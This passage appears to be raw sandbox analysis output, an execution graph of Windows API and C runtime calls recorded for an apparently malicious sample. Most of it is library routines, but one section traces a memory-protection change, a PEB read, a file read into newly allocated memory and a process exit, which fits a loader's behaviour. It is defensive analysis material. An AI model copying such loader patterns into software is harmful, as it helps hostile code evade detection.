                            • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: lstrlen$CharNextlstrcmpi
                            • String ID:
                            • API String ID: 190613189-0
                            • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                            • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                            • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                            • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:17.7%
                            Dynamic/Decrypted Code Coverage:5.6%
                            Signature Coverage:5.8%
                            Total number of Nodes:1983
                            Total number of Limit Nodes:115
6848->6818 6848->6829 6849->6844 6849->6850 6851 132148f _malloc 64 API calls 6850->6851 6855 132ae98 _memset __crtLCMapStringA_stat 6850->6855 6851->6855 6852 132aef5 MultiByteToWideChar 6853 132af2c 6852->6853 6854 132af0d 6852->6854 6856 1329739 __crtLCMapStringA_stat 64 API calls 6853->6856 6857 132af31 6854->6857 6858 132af14 WideCharToMultiByte 6854->6858 6855->6843 6855->6852 6856->6843 6859 132af50 6857->6859 6860 132af3c WideCharToMultiByte 6857->6860 6858->6853 6861 1325750 __calloc_crt 64 API calls 6859->6861 6860->6853 6860->6859 6862 132af58 6861->6862 6862->6853 6863 132af61 WideCharToMultiByte 6862->6863 6863->6853 6864 132af73 6863->6864 6865 132567d __read_nolock 64 API calls 6864->6865 6865->6853 6869 132b1ef 6866->6869 6870 132b208 6869->6870 6871 132afc0 strtoxl 88 API calls 6870->6871 6872 132afbb 6871->6872 6872->6837 6874 132a16c LCMapStringW 6873->6874 6877 132a187 6873->6877 6875 132a18f GetLastError 6874->6875 6874->6877 6875->6877 6876 132a385 6879 132adad ___ansicp 88 API calls 6876->6879 6877->6876 6878 132a1e1 6877->6878 6880 132a1fa MultiByteToWideChar 6878->6880 6896 132a37c 6878->6896 6881 132a3ad 6879->6881 6886 132a227 6880->6886 6880->6896 6884 132a4a1 LCMapStringA 6881->6884 6885 132a3c6 6881->6885 6881->6896 6882 1325b55 __crtLCMapStringA_stat 5 API calls 6883 1328719 6882->6883 6883->6796 6887 132a3fd 6884->6887 6888 132adf6 ___convertcp 71 API calls 6885->6888 6891 132148f _malloc 64 API calls 6886->6891 6900 132a240 __crtLCMapStringA_stat 6886->6900 6890 132a4c8 6887->6890 6895 132567d __read_nolock 64 API calls 6887->6895 6892 132a3d8 6888->6892 6889 132a278 MultiByteToWideChar 6893 132a291 LCMapStringW 6889->6893 6894 132a373 6889->6894 6890->6896 6902 132567d __read_nolock 64 API calls 6890->6902 6891->6900 6892->6896 6897 132a3e2 LCMapStringA 6892->6897 6893->6894 6899 132a2b2 6893->6899 6898 1329739 __crtLCMapStringA_stat 64 API calls 6894->6898 6895->6890 6896->6882 6897->6887 6906 132a404 6897->6906 6898->6896 6901 
132a2bb 6899->6901 6905 132a2e4 6899->6905 6900->6889 6900->6896 6901->6894 6903 132a2cd LCMapStringW 6901->6903 6902->6896 6903->6894 6904 132a333 LCMapStringW 6907 132a34b WideCharToMultiByte 6904->6907 6908 132a36d 6904->6908 6910 132a2ff __crtLCMapStringA_stat 6905->6910 6912 132148f _malloc 64 API calls 6905->6912 6909 132148f _malloc 64 API calls 6906->6909 6911 132a415 _memset __crtLCMapStringA_stat 6906->6911 6907->6908 6913 1329739 __crtLCMapStringA_stat 64 API calls 6908->6913 6909->6911 6910->6894 6910->6904 6911->6887 6914 132a453 LCMapStringA 6911->6914 6912->6910 6913->6894 6916 132a473 6914->6916 6917 132a46f 6914->6917 6918 132adf6 ___convertcp 71 API calls 6916->6918 6919 1329739 __crtLCMapStringA_stat 64 API calls 6917->6919 6918->6917 6919->6887 6920->6786 6922 1325e01 6921->6922 6923 1324fdb __encode_pointer 7 API calls 6922->6923 6924 1325e19 6922->6924 6923->6922 6924->6069 6928 1325da8 6925->6928 6927 1325df1 6927->6071 6929 1325db4 _doexit 6928->6929 6936 1322d18 6929->6936 6935 1325dd5 _doexit 6935->6927 6937 1321f64 __lock 64 API calls 6936->6937 6938 1322d1f 6937->6938 6939 1325cbd 6938->6939 6940 1325056 __decode_pointer 6 API calls 6939->6940 6941 1325cd1 6940->6941 6942 1325056 __decode_pointer 6 API calls 6941->6942 6943 1325ce1 6942->6943 6951 1325d64 6943->6951 6959 1329576 6943->6959 6945 1324fdb __encode_pointer 7 API calls 6947 1325d59 6945->6947 6946 1325cff 6948 1325d23 6946->6948 6955 1325d4b 6946->6955 6972 132579c 6946->6972 6949 1324fdb __encode_pointer 7 API calls 6947->6949 6948->6951 6952 132579c __realloc_crt 71 API calls 6948->6952 6953 1325d39 6948->6953 6949->6951 6956 1325dde 6951->6956 6952->6953 6953->6951 6954 1324fdb __encode_pointer 7 API calls 6953->6954 6954->6955 6955->6945 7022 1322d21 6956->7022 6960 1329582 _doexit 6959->6960 6961 1329592 6960->6961 6962 13295af 6960->6962 6964 13231da __mbsnbcmp_l 64 API calls 6961->6964 6963 13295f0 HeapSize 6962->6963 6965 1321f64 __lock 64 API calls 6962->6965 6968 
13295a7 _doexit 6963->6968 6966 1329597 6964->6966 6969 13295bf ___sbh_find_block 6965->6969 6967 1323941 __mbsnbcmp_l 6 API calls 6966->6967 6967->6968 6968->6946 6977 1329610 6969->6977 6975 13257a5 6972->6975 6974 13257e4 6974->6948 6975->6974 6976 13257c5 Sleep 6975->6976 6981 13290eb 6975->6981 6976->6975 6980 1321e8a LeaveCriticalSection 6977->6980 6979 13295eb 6979->6963 6979->6968 6980->6979 6982 13290f7 _doexit 6981->6982 6983 13290fe 6982->6983 6984 132910c 6982->6984 6985 132148f _malloc 64 API calls 6983->6985 6986 1329113 6984->6986 6987 132911f 6984->6987 7002 1329106 _doexit __dosmaperr 6985->7002 6988 132567d __read_nolock 64 API calls 6986->6988 6994 1329291 6987->6994 7016 132912c ___sbh_resize_block ___sbh_find_block 6987->7016 6988->7002 6989 13292c4 6990 1323232 _malloc 6 API calls 6989->6990 6993 13292ca 6990->6993 6991 1321f64 __lock 64 API calls 6991->7016 6992 1329296 HeapReAlloc 6992->6994 6992->7002 6995 13231da __mbsnbcmp_l 64 API calls 6993->6995 6994->6989 6994->6992 6996 13292e8 6994->6996 6997 1323232 _malloc 6 API calls 6994->6997 6999 13292de 6994->6999 6995->7002 6998 13231da __mbsnbcmp_l 64 API calls 6996->6998 6996->7002 6997->6994 7000 13292f1 GetLastError 6998->7000 7003 13231da __mbsnbcmp_l 64 API calls 6999->7003 7000->7002 7002->6975 7005 132925f 7003->7005 7004 13291b7 HeapAlloc 7004->7016 7005->7002 7007 1329264 GetLastError 7005->7007 7006 132920c HeapReAlloc 7006->7016 7007->7002 7008 1322776 ___sbh_alloc_block 4 API calls 7008->7016 7009 1329277 7009->7002 7011 13231da __mbsnbcmp_l 64 API calls 7009->7011 7010 1323232 _malloc 6 API calls 7010->7016 7014 1329284 7011->7014 7012 132925a 7015 13231da __mbsnbcmp_l 64 API calls 7012->7015 7013 1327760 __VEC_memcpy _memcpy_s 7013->7016 7014->7000 7014->7002 7015->7005 7016->6989 7016->6991 7016->7002 7016->7004 7016->7006 7016->7008 7016->7009 7016->7010 7016->7012 7016->7013 7017 1321fc7 VirtualFree VirtualFree ___sbh_free_block 7016->7017 7018 132922f 7016->7018 7017->7016 
7021 1321e8a LeaveCriticalSection 7018->7021 7020 1329236 7020->7016 7021->7020 7025 1321e8a LeaveCriticalSection 7022->7025 7024 1322d28 7024->6935 7025->7024 7075 1321585 7026->7075 7028 1321239 7029 1321bb2 7028->7029 7032 1321bbe _doexit 7029->7032 7030 1321bcc 7031 13231da __mbsnbcmp_l 64 API calls 7030->7031 7034 1321bd1 7031->7034 7032->7030 7033 1321bfa 7032->7033 7548 132332b 7033->7548 7036 1323941 __mbsnbcmp_l 6 API calls 7034->7036 7041 1321be1 _doexit 7036->7041 7041->6082 7043 1321ac6 _doexit 7042->7043 7044 1321af1 7043->7044 7045 1321ad4 7043->7045 7047 132332b __lock_file 65 API calls 7044->7047 7046 13231da __mbsnbcmp_l 64 API calls 7045->7046 7048 1321ad9 7046->7048 7049 1321af9 7047->7049 7050 1323941 __mbsnbcmp_l 6 API calls 7048->7050 7051 132191d __ftell_nolock 68 API calls 7049->7051 7053 1321ae9 _doexit 7050->7053 7052 1321b05 7051->7052 7627 1321b1e 7052->7627 7053->6084 7630 132186a 7055->7630 7057 1321290 VirtualProtect 7058 2b131e7 7057->7058 7070 2b13356 7057->7070 7800 2b1298f GetPEB 7058->7800 7060 2b13242 7801 2b13168 7060->7801 7062 2b1324a 7063 2b132dd 7062->7063 7064 2b132f9 CreateFileW 7062->7064 7063->6092 7064->7063 7065 2b13323 VirtualAlloc ReadFile 7064->7065 7065->7063 7068 2b13350 7065->7068 7066 2b13369 7066->6092 7068->7066 7069 2b1383b ExitProcess 7068->7069 7814 2b12b3a 7068->7814 7071 2b1335d 7070->7071 7072 2b13369 7071->7072 7073 2b12b3a 15 API calls 7071->7073 7074 2b1383b ExitProcess 7071->7074 7072->6092 7073->7071 7078 1321591 _doexit 7075->7078 7076 13215a4 7077 13231da __mbsnbcmp_l 64 API calls 7076->7077 7079 13215a9 7077->7079 7078->7076 7080 13215d9 7078->7080 7081 1323941 __mbsnbcmp_l 6 API calls 7079->7081 7094 13236d2 7080->7094 7091 13215b9 _doexit @_EH4_CallFilterFunc@8 7081->7091 7083 13215de 7084 13215f2 7083->7084 7085 13215e5 7083->7085 7087 1321619 7084->7087 7088 13215f9 7084->7088 7086 13231da __mbsnbcmp_l 64 API calls 7085->7086 7086->7091 7112 1323409 7087->7112 7089 13231da __mbsnbcmp_l 64 
API calls 7088->7089 7089->7091 7091->7028 7095 13236de _doexit 7094->7095 7096 1321f64 __lock 64 API calls 7095->7096 7109 13236ec 7096->7109 7097 1323761 7137 1323801 7097->7137 7098 1323768 7099 132570b __malloc_crt 64 API calls 7098->7099 7101 1323772 7099->7101 7101->7097 7103 132561d __mtinitlocknum InitializeCriticalSectionAndSpinCount 7101->7103 7102 13237f6 _doexit 7102->7083 7106 1323797 7103->7106 7104 1321ea1 __mtinitlocknum 64 API calls 7104->7109 7107 13237a2 7106->7107 7108 13237b5 EnterCriticalSection 7106->7108 7110 132567d __read_nolock 64 API calls 7107->7110 7108->7097 7109->7097 7109->7098 7109->7104 7140 132336c 7109->7140 7145 13233da 7109->7145 7110->7097 7113 132342b 7112->7113 7114 132343f 7113->7114 7125 132345e 7113->7125 7115 13231da __mbsnbcmp_l 64 API calls 7114->7115 7116 1323444 7115->7116 7117 1323941 __mbsnbcmp_l 6 API calls 7116->7117 7122 1321624 7117->7122 7118 1323671 7121 13231da __mbsnbcmp_l 64 API calls 7118->7121 7119 132368b 7152 1326cf8 7119->7152 7123 1323676 7121->7123 7134 132163f 7122->7134 7124 1323941 __mbsnbcmp_l 6 API calls 7123->7124 7124->7122 7125->7118 7133 132361b 7125->7133 7155 132714e 7125->7155 7130 1326fca __fassign 99 API calls 7131 1323634 7130->7131 7132 1326fca __fassign 99 API calls 7131->7132 7131->7133 7132->7133 7133->7118 7133->7119 7541 132339e 7134->7541 7136 1321647 7136->7091 7150 1321e8a LeaveCriticalSection 7137->7150 7139 1323808 7139->7102 7141 1323379 7140->7141 7142 132338f EnterCriticalSection 7140->7142 7143 1321f64 __lock 64 API calls 7141->7143 7142->7109 7144 1323382 7143->7144 7144->7109 7146 13233ea 7145->7146 7147 13233fd LeaveCriticalSection 7145->7147 7151 1321e8a LeaveCriticalSection 7146->7151 7147->7109 7149 13233fa 7149->7109 7150->7139 7151->7149 7161 1326c2c 7152->7161 7154 1326d13 7154->7122 7488 1326fe4 7155->7488 7157 13235e6 7157->7118 7158 1326fca 7157->7158 7501 1326d9f 7158->7501 7164 1326c38 _doexit 7161->7164 7162 1326c4b 7163 13231da __mbsnbcmp_l 64 API calls 
7162->7163 7165 1326c50 7163->7165 7164->7162 7166 1326c89 7164->7166 7167 1323941 __mbsnbcmp_l 6 API calls 7165->7167 7172 132650d 7166->7172 7171 1326c5f _doexit 7167->7171 7171->7154 7173 1326532 7172->7173 7237 1329c27 7173->7237 7176 1326553 7177 1323819 __invoke_watson 10 API calls 7176->7177 7178 132655d 7177->7178 7182 1326560 7178->7182 7179 1326596 7261 13231ed 7179->7261 7182->7179 7186 1326656 7182->7186 7183 13231da __mbsnbcmp_l 64 API calls 7184 13265a5 7183->7184 7185 1323941 __mbsnbcmp_l 6 API calls 7184->7185 7209 13265b4 7185->7209 7243 13275ba 7186->7243 7188 13266f8 7189 1326719 CreateFileA 7188->7189 7190 13266ff 7188->7190 7191 13267b3 GetFileType 7189->7191 7192 1326746 7189->7192 7193 13231ed __read_nolock 64 API calls 7190->7193 7196 13267c0 GetLastError 7191->7196 7197 1326804 7191->7197 7195 132677f GetLastError 7192->7195 7199 132675a CreateFileA 7192->7199 7194 1326704 7193->7194 7198 13231da __mbsnbcmp_l 64 API calls 7194->7198 7264 1323200 7195->7264 7201 1323200 __dosmaperr 64 API calls 7196->7201 7269 1327375 7197->7269 7203 132670e 7198->7203 7199->7191 7199->7195 7202 13267e9 CloseHandle 7201->7202 7202->7203 7204 13267f7 7202->7204 7207 13231da __mbsnbcmp_l 64 API calls 7203->7207 7206 13231da __mbsnbcmp_l 64 API calls 7204->7206 7208 13267fc 7206->7208 7207->7209 7208->7203 7233 1326cca 7209->7233 7210 1326a42 7210->7209 7213 1326baf CloseHandle CreateFileA 7210->7213 7215 1326bda GetLastError 7213->7215 7216 1326ab7 7213->7216 7217 1323200 __dosmaperr 64 API calls 7215->7217 7216->7209 7220 1326be6 7217->7220 7218 13231ed __read_nolock 64 API calls 7226 1326898 7218->7226 7219 1323be6 74 API calls __read_nolock 7219->7226 7359 13273f6 7220->7359 7225 13268a0 7225->7226 7231 13272f0 66 API calls __lseeki64_nolock 7225->7231 7288 1329a02 7225->7288 7303 132984c 7225->7303 7226->7210 7226->7219 7226->7225 7227 1326aaa 7226->7227 7230 132462e 66 API calls __lseek_nolock 7226->7230 7334 132839d 7226->7334 7228 1329a02 __close_nolock 
67 API calls 7227->7228 7229 1326ab1 7228->7229 7232 13231da __mbsnbcmp_l 64 API calls 7229->7232 7230->7226 7231->7225 7232->7216 7234 1326cf6 7233->7234 7235 1326ccf 7233->7235 7234->7171 7487 1327593 LeaveCriticalSection 7235->7487 7238 1329c36 7237->7238 7240 132654e 7237->7240 7239 13231da __mbsnbcmp_l 64 API calls 7238->7239 7241 1329c3b 7239->7241 7240->7176 7240->7182 7242 1323941 __mbsnbcmp_l 6 API calls 7241->7242 7242->7240 7244 13275c6 _doexit 7243->7244 7245 1321ea1 __mtinitlocknum 64 API calls 7244->7245 7246 13275d6 7245->7246 7247 1321f64 __lock 64 API calls 7246->7247 7248 13275db _doexit 7246->7248 7260 13275ea 7247->7260 7248->7188 7250 13276c3 7251 1325750 __calloc_crt 64 API calls 7250->7251 7254 13276cc 7251->7254 7252 132766b EnterCriticalSection 7255 132767b LeaveCriticalSection 7252->7255 7252->7260 7253 1321f64 __lock 64 API calls 7253->7260 7259 132772d 7254->7259 7371 13274f3 7254->7371 7255->7260 7257 132561d __mtinitlocknum InitializeCriticalSectionAndSpinCount 7257->7260 7381 132774b 7259->7381 7260->7250 7260->7252 7260->7253 7260->7257 7260->7259 7368 132768d 7260->7368 7262 1325229 __getptd_noexit 64 API calls 7261->7262 7263 13231f2 7262->7263 7263->7183 7265 13231ed __read_nolock 64 API calls 7264->7265 7266 132320b __dosmaperr 7265->7266 7267 13231da __mbsnbcmp_l 64 API calls 7266->7267 7268 132321e 7267->7268 7268->7203 7270 1327383 7269->7270 7271 13273dc 7269->7271 7270->7271 7273 13273a7 7270->7273 7272 13231da __mbsnbcmp_l 64 API calls 7271->7272 7274 13273e1 7272->7274 7275 1326822 7273->7275 7277 13273cc SetStdHandle 7273->7277 7276 13231ed __read_nolock 64 API calls 7274->7276 7275->7210 7275->7226 7278 132462e 7275->7278 7276->7275 7277->7275 7389 132747c 7278->7389 7280 132463d 7281 1324653 SetFilePointer 7280->7281 7282 1324643 7280->7282 7284 1324672 7281->7284 7285 132466a GetLastError 7281->7285 7283 13231da __mbsnbcmp_l 64 API calls 7282->7283 7286 1324648 7283->7286 7284->7286 7287 1323200 __dosmaperr 64 API 
calls 7284->7287 7285->7284 7286->7218 7286->7226 7287->7286 7289 132747c __close_nolock 64 API calls 7288->7289 7292 1329a12 7289->7292 7290 1329a68 7291 13273f6 __free_osfhnd 65 API calls 7290->7291 7296 1329a70 7291->7296 7292->7290 7293 1329a46 7292->7293 7294 132747c __close_nolock 64 API calls 7292->7294 7293->7290 7295 132747c __close_nolock 64 API calls 7293->7295 7297 1329a3d 7294->7297 7298 1329a52 CloseHandle 7295->7298 7299 1329a92 7296->7299 7302 1323200 __dosmaperr 64 API calls 7296->7302 7300 132747c __close_nolock 64 API calls 7297->7300 7298->7290 7301 1329a5e GetLastError 7298->7301 7299->7225 7300->7293 7301->7290 7302->7299 7402 13272f0 7303->7402 7306 13298ce 7308 13231da __mbsnbcmp_l 64 API calls 7306->7308 7309 13298d9 7306->7309 7307 13272f0 __lseeki64_nolock 66 API calls 7311 1329887 7307->7311 7308->7309 7309->7225 7310 1329969 7316 13272f0 __lseeki64_nolock 66 API calls 7310->7316 7330 1329945 7310->7330 7311->7306 7311->7310 7312 13298ad GetProcessHeap HeapAlloc 7311->7312 7313 13298e0 __setmode_nolock 7312->7313 7314 13298c9 7312->7314 7325 132994c 7313->7325 7333 1329923 __setmode_nolock 7313->7333 7412 1327c6a 7313->7412 7317 13231da __mbsnbcmp_l 64 API calls 7314->7317 7315 13272f0 __lseeki64_nolock 66 API calls 7315->7306 7318 1329982 7316->7318 7317->7306 7318->7306 7319 132747c __close_nolock 64 API calls 7318->7319 7320 1329998 SetEndOfFile 7319->7320 7321 13299b5 7320->7321 7320->7330 7323 13231da __mbsnbcmp_l 64 API calls 7321->7323 7324 13299ba 7323->7324 7327 13231ed __read_nolock 64 API calls 7324->7327 7326 13231ed __read_nolock 64 API calls 7325->7326 7328 1329951 7326->7328 7329 13299c5 GetLastError 7327->7329 7332 13231da __mbsnbcmp_l 64 API calls 7328->7332 7328->7333 7329->7330 7330->7306 7330->7315 7331 1329931 GetProcessHeap 7331->7330 7332->7333 7333->7331 7335 13283a9 _doexit 7334->7335 7336 13283b1 7335->7336 7339 13283cc 7335->7339 7338 13231ed __read_nolock 64 API calls 7336->7338 7337 13283da 7340 13231ed 
__read_nolock 64 API calls 7337->7340 7341 13283b6 7338->7341 7339->7337 7343 132841b 7339->7343 7342 13283df 7340->7342 7344 13231da __mbsnbcmp_l 64 API calls 7341->7344 7345 13231da __mbsnbcmp_l 64 API calls 7342->7345 7346 13274f3 ___lock_fhandle 65 API calls 7343->7346 7354 13283be _doexit 7344->7354 7347 13283e6 7345->7347 7348 1328421 7346->7348 7349 1323941 __mbsnbcmp_l 6 API calls 7347->7349 7350 1328444 7348->7350 7351 132842e 7348->7351 7349->7354 7353 13231da __mbsnbcmp_l 64 API calls 7350->7353 7352 1327c6a __write_nolock 96 API calls 7351->7352 7355 132843c 7352->7355 7356 1328449 7353->7356 7354->7226 7483 132846f 7355->7483 7357 13231ed __read_nolock 64 API calls 7356->7357 7357->7355 7360 1327462 7359->7360 7361 1327407 7359->7361 7362 13231da __mbsnbcmp_l 64 API calls 7360->7362 7361->7360 7366 1327432 7361->7366 7363 1327467 7362->7363 7364 13231ed __read_nolock 64 API calls 7363->7364 7365 1327458 7364->7365 7365->7216 7366->7365 7367 1327452 SetStdHandle 7366->7367 7367->7365 7384 1321e8a LeaveCriticalSection 7368->7384 7370 1327694 7370->7260 7372 13274ff _doexit 7371->7372 7373 132755a 7372->7373 7376 1321f64 __lock 64 API calls 7372->7376 7374 132755f EnterCriticalSection 7373->7374 7375 132757c _doexit 7373->7375 7374->7375 7375->7259 7377 132752b 7376->7377 7378 1327542 7377->7378 7380 132561d __mtinitlocknum InitializeCriticalSectionAndSpinCount 7377->7380 7385 132758a 7378->7385 7380->7378 7388 1321e8a LeaveCriticalSection 7381->7388 7383 1327752 7383->7248 7384->7370 7386 1321e8a _doexit LeaveCriticalSection 7385->7386 7387 1327591 7386->7387 7387->7373 7388->7383 7390 1327489 7389->7390 7393 13274a1 7389->7393 7391 13231ed __read_nolock 64 API calls 7390->7391 7392 132748e 7391->7392 7395 13231da __mbsnbcmp_l 64 API calls 7392->7395 7394 13231ed __read_nolock 64 API calls 7393->7394 7396 13274e6 7393->7396 7397 13274cf 7394->7397 7398 1327496 7395->7398 7396->7280 7399 13231da __mbsnbcmp_l 64 API calls 7397->7399 7398->7280 7400 13274d6 
7399->7400 7401 1323941 __mbsnbcmp_l 6 API calls 7400->7401 7401->7396 7403 132747c __close_nolock 64 API calls 7402->7403 7404 132730e 7403->7404 7405 1327316 7404->7405 7406 1327327 SetFilePointer 7404->7406 7407 13231da __mbsnbcmp_l 64 API calls 7405->7407 7408 132733f GetLastError 7406->7408 7410 132731b 7406->7410 7407->7410 7409 1327349 7408->7409 7408->7410 7411 1323200 __dosmaperr 64 API calls 7409->7411 7410->7306 7410->7307 7411->7410 7413 1327c79 __write_nolock 7412->7413 7414 1327cd2 7413->7414 7415 1327cab 7413->7415 7445 1327ca0 7413->7445 7418 1327d14 7414->7418 7422 1327d3a 7414->7422 7417 13231ed __read_nolock 64 API calls 7415->7417 7416 1325b55 __crtLCMapStringA_stat 5 API calls 7419 132839b 7416->7419 7420 1327cb0 7417->7420 7421 13231ed __read_nolock 64 API calls 7418->7421 7419->7313 7424 13231da __mbsnbcmp_l 64 API calls 7420->7424 7425 1327d19 7421->7425 7423 1327d4e 7422->7423 7426 13272f0 __lseeki64_nolock 66 API calls 7422->7426 7471 132a0b1 7423->7471 7427 1327cb7 7424->7427 7430 13231da __mbsnbcmp_l 64 API calls 7425->7430 7426->7423 7431 1323941 __mbsnbcmp_l 6 API calls 7427->7431 7429 1327d59 7432 1327fff 7429->7432 7437 13252a2 __getptd 64 API calls 7429->7437 7433 1327d22 7430->7433 7431->7445 7435 13282ce WriteFile 7432->7435 7436 132800f 7432->7436 7434 1323941 __mbsnbcmp_l 6 API calls 7433->7434 7434->7445 7440 1328301 GetLastError 7435->7440 7441 1327fe1 7435->7441 7438 13280ed 7436->7438 7461 1328023 7436->7461 7439 1327d74 GetConsoleMode 7437->7439 7460 13281cd 7438->7460 7463 13280fc 7438->7463 7439->7432 7443 1327d9f 7439->7443 7440->7441 7442 132834c 7441->7442 7441->7445 7447 132831f 7441->7447 7442->7445 7446 13231da __mbsnbcmp_l 64 API calls 7442->7446 7443->7432 7444 1327db1 GetConsoleCP 7443->7444 7444->7441 7469 1327dd4 7444->7469 7445->7416 7449 132836f 7446->7449 7451 132832a 7447->7451 7452 132833e 7447->7452 7448 1328091 WriteFile 7448->7440 7448->7461 7457 13231ed __read_nolock 64 API calls 7449->7457 7450 
1328233 WideCharToMultiByte 7450->7440 7454 132826a WriteFile 7450->7454 7453 13231da __mbsnbcmp_l 64 API calls 7451->7453 7456 1323200 __dosmaperr 64 API calls 7452->7456 7458 132832f 7453->7458 7459 13282a1 GetLastError 7454->7459 7454->7460 7455 1328171 WriteFile 7455->7440 7455->7463 7456->7445 7457->7445 7462 13231ed __read_nolock 64 API calls 7458->7462 7459->7460 7460->7441 7460->7442 7460->7450 7460->7454 7461->7441 7461->7442 7461->7448 7462->7445 7463->7441 7463->7442 7463->7455 7465 1329e70 11 API calls __putwch_nolock 7465->7469 7466 1327e80 WideCharToMultiByte 7466->7441 7468 1327eb1 WriteFile 7466->7468 7467 132a04c 76 API calls __fassign 7467->7469 7468->7440 7468->7469 7469->7440 7469->7441 7469->7465 7469->7466 7469->7467 7470 1327f05 WriteFile 7469->7470 7480 132a09e 7469->7480 7470->7440 7470->7469 7472 132a0be 7471->7472 7473 132a0cd 7471->7473 7474 13231da __mbsnbcmp_l 64 API calls 7472->7474 7476 132a0f1 7473->7476 7477 13231da __mbsnbcmp_l 64 API calls 7473->7477 7475 132a0c3 7474->7475 7475->7429 7476->7429 7478 132a0e1 7477->7478 7479 1323941 __mbsnbcmp_l 6 API calls 7478->7479 7479->7476 7481 132a066 __isleadbyte_l 74 API calls 7480->7481 7482 132a0ad 7481->7482 7482->7469 7486 1327593 LeaveCriticalSection 7483->7486 7485 1328477 7485->7354 7486->7485 7487->7234 7489 1326ffb 7488->7489 7500 1326ff4 _strncmp 7488->7500 7490 1326d18 _LocaleUpdate::_LocaleUpdate 74 API calls 7489->7490 7491 1327007 7490->7491 7492 1327065 7491->7492 7493 132703a 7491->7493 7491->7500 7495 13231da __mbsnbcmp_l 64 API calls 7492->7495 7492->7500 7494 13231da __mbsnbcmp_l 64 API calls 7493->7494 7496 132703f 7494->7496 7497 1327072 7495->7497 7498 1323941 __mbsnbcmp_l 6 API calls 7496->7498 7499 1323941 __mbsnbcmp_l 6 API calls 7497->7499 7498->7500 7499->7500 7500->7157 7502 1326d18 _LocaleUpdate::_LocaleUpdate 74 API calls 7501->7502 7503 1326db3 7502->7503 7504 1326dd5 7503->7504 7505 1326dfb 7503->7505 7515 1323614 7503->7515 7516 1329d52 7504->7516 7507 
1326e00 7505->7507 7508 1326e2e 7505->7508 7509 13231da __mbsnbcmp_l 64 API calls 7507->7509 7511 13231da __mbsnbcmp_l 64 API calls 7508->7511 7508->7515 7510 1326e05 7509->7510 7513 1323941 __mbsnbcmp_l 6 API calls 7510->7513 7512 1326e3b 7511->7512 7514 1323941 __mbsnbcmp_l 6 API calls 7512->7514 7513->7515 7514->7515 7515->7130 7515->7133 7517 1329d62 7516->7517 7522 1329d94 7516->7522 7518 1329d67 7517->7518 7517->7522 7520 13231da __mbsnbcmp_l 64 API calls 7518->7520 7521 1329d6c 7520->7521 7523 1323941 __mbsnbcmp_l 6 API calls 7521->7523 7525 1329c60 7522->7525 7524 1329d7c 7523->7524 7524->7515 7526 1329c76 7525->7526 7539 1329c9b ___ascii_strnicmp 7525->7539 7527 1326d18 _LocaleUpdate::_LocaleUpdate 74 API calls 7526->7527 7528 1329c81 7527->7528 7529 1329c86 7528->7529 7531 1329cbb 7528->7531 7530 13231da __mbsnbcmp_l 64 API calls 7529->7530 7532 1329c8b 7530->7532 7533 1329cc5 7531->7533 7540 1329ced 7531->7540 7535 1323941 __mbsnbcmp_l 6 API calls 7532->7535 7534 13231da __mbsnbcmp_l 64 API calls 7533->7534 7536 1329cca 7534->7536 7535->7539 7538 1323941 __mbsnbcmp_l 6 API calls 7536->7538 7537 132abdd 99 API calls __tolower_l 7537->7540 7538->7539 7539->7524 7540->7537 7540->7539 7542 13233ce LeaveCriticalSection 7541->7542 7543 13233af 7541->7543 7542->7136 7543->7542 7544 13233b6 7543->7544 7547 1321e8a LeaveCriticalSection 7544->7547 7546 13233cb 7546->7136 7547->7546 7549 132335f EnterCriticalSection 7548->7549 7550 132333d 7548->7550 7552 1321c02 7549->7552 7550->7549 7551 1323345 7550->7551 7553 1321f64 __lock 64 API calls 7551->7553 7554 1321b28 7552->7554 7553->7552 7555 1321b48 7554->7555 7556 1321b38 7554->7556 7558 1321b5a 7555->7558 7606 132191d 7555->7606 7557 13231da __mbsnbcmp_l 64 API calls 7556->7557 7565 1321b3d 7557->7565 7569 132477f 7558->7569 7566 1321c2d 7565->7566 7567 132339e _ftell 2 API calls 7566->7567 7568 1321c35 7567->7568 7568->7041 7570 1321b68 7569->7570 7571 1324798 7569->7571 7575 13242a5 7570->7575 7571->7570 7572 
13242a5 __fileno 64 API calls 7571->7572 7573 13247b3 7572->7573 7574 132839d __locking 98 API calls 7573->7574 7574->7570 7576 1321b9a 7575->7576 7577 13242b4 7575->7577 7581 13246a3 7576->7581 7578 13231da __mbsnbcmp_l 64 API calls 7577->7578 7579 13242b9 7578->7579 7580 1323941 __mbsnbcmp_l 6 API calls 7579->7580 7580->7576 7582 13246af _doexit 7581->7582 7583 13246d2 7582->7583 7584 13246b7 7582->7584 7585 13246e0 7583->7585 7591 1324721 7583->7591 7586 13231ed __read_nolock 64 API calls 7584->7586 7588 13231ed __read_nolock 64 API calls 7585->7588 7587 13246bc 7586->7587 7589 13231da __mbsnbcmp_l 64 API calls 7587->7589 7590 13246e5 7588->7590 7601 13246c4 _doexit 7589->7601 7592 13231da __mbsnbcmp_l 64 API calls 7590->7592 7593 13274f3 ___lock_fhandle 65 API calls 7591->7593 7595 13246ec 7592->7595 7594 1324727 7593->7594 7596 1324734 7594->7596 7597 132474a 7594->7597 7598 1323941 __mbsnbcmp_l 6 API calls 7595->7598 7599 132462e __lseek_nolock 66 API calls 7596->7599 7600 13231da __mbsnbcmp_l 64 API calls 7597->7600 7598->7601 7602 1324742 7599->7602 7603 132474f 7600->7603 7601->7565 7623 1324775 7602->7623 7604 13231ed __read_nolock 64 API calls 7603->7604 7604->7602 7607 1321950 7606->7607 7608 1321930 7606->7608 7610 13242a5 __fileno 64 API calls 7607->7610 7609 13231da __mbsnbcmp_l 64 API calls 7608->7609 7611 1321935 7609->7611 7612 1321956 7610->7612 7613 1323941 __mbsnbcmp_l 6 API calls 7611->7613 7614 13246a3 __locking 68 API calls 7612->7614 7622 1321945 7613->7622 7615 132196b 